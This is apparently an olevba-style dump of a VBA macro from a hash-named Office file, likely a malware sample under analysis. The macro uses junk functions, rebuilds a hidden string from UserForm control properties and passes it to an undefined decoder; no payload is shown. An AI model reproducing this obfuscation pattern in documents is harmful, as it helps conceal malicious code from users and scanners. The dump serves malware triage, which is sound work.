Filename     : ./macros/7c4ee5ed1956a5e51c0d52e90da16337b6172ca5f75b966a9c58f9ad7535df04
OLE stream   : Macros/VBA/Module1
VBA filename : Module1.bas
----------------------------------------
Attribute VB_Name = "Module1"
Function Padalero()
Dim jir As Integer
jir = 1 + 5
Padalero = jir - 1
jir = 1 + Padalero
End Function

Function rarhelop()
Dim str As String
str = UserForm1.ListBox1.Tag
str = str + UserForm1.TextBox1.Text
rarhelop = str + UserForm1.TextBox2.Text
End Function

Sub Do_Open_and_Replace()
Dim sdata As String
Dim ind As Integer
cometomed = 90
sdata = "" + rarhelop()
Dim sder As String
sdata = "" + sdata
sder = Bishbarbak(cometomed, sdata)
cometomed = 0
Rem UserForm1.ListBox1.Clear
End Sub









